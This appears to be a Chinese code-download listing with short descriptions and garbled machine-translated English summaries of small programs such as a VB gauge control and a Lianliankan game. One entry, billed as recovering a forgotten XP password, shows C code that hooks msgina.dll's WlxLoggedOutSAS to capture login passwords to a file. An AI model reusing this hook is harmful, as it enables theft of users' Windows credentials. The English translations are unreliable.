-
将多条记录写进数据库
将多条记录写进数据库-will be written into the record a number of database
- 2023-02-24 16:40:04下载
- 积分:1
-
包含多种使用数学小程序的程序包,对初学者入门有很大帮助
包含多种使用数学小程序的程序包,对初学者入门有很大帮助-Contains a variety of procedures for the use of mathematics in small packages, the entry of great help for beginners
- 2022-06-12 12:45:53下载
- 积分:1
-
此资源主要是实现名单登陆系统的功能,运行环境为VC
此资源主要是实现名单登陆系统的功能,运行环境为VC-The resources are mainly to achieve the list of login function of the system, operating environment for the VC
- 2022-08-16 04:58:05下载
- 积分:1
-
on assembly language, the flower design of the audible procedures, primarily the...
基于汇编语言的电子琴设计中的发声程序,主要是利用计算机硬件发声-on assembly language, the flower design of the audible procedures, primarily the use of computer hardware audible! !
- 2022-02-26 22:35:10下载
- 积分:1
-
一个vb虚拟仪表ocx控件,可以自由设定显示刻度,表上的说明等...
一个vb虚拟仪表ocx控件,可以自由设定显示刻度,表上的说明等-a vb Virtual Instrument randomly controls and the freedom to set calibration shows, the list notes, etc.
- 2023-04-25 09:55:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
wince下的连连看的源代码,EVC编译
wince下的连连看的源代码,EVC编译-wince under the Lianliankan source code, EVC compiling
- 2022-07-19 00:23:43下载
- 积分:1
-
模拟汽车速度表
一个仪表盘的例子,超漂亮,可以看看,用vc开发的-Example of a dashboard, super beautiful, you can see, using vc development
- 2023-07-25 01:10:04下载
- 积分:1
-
一个使用C++BUILDER开发的邮戳打印程序
一个使用C++BUILDER开发的邮戳打印程序-A use of C++ BUILDER developed procedures postmark Print
- 2023-04-04 03:55:04下载
- 积分:1
-
VC中设置并叠加透明图片实例
window窗口上面设置并叠加透明图片的示例代码。
- 2022-11-04 13:40:03下载
- 积分:1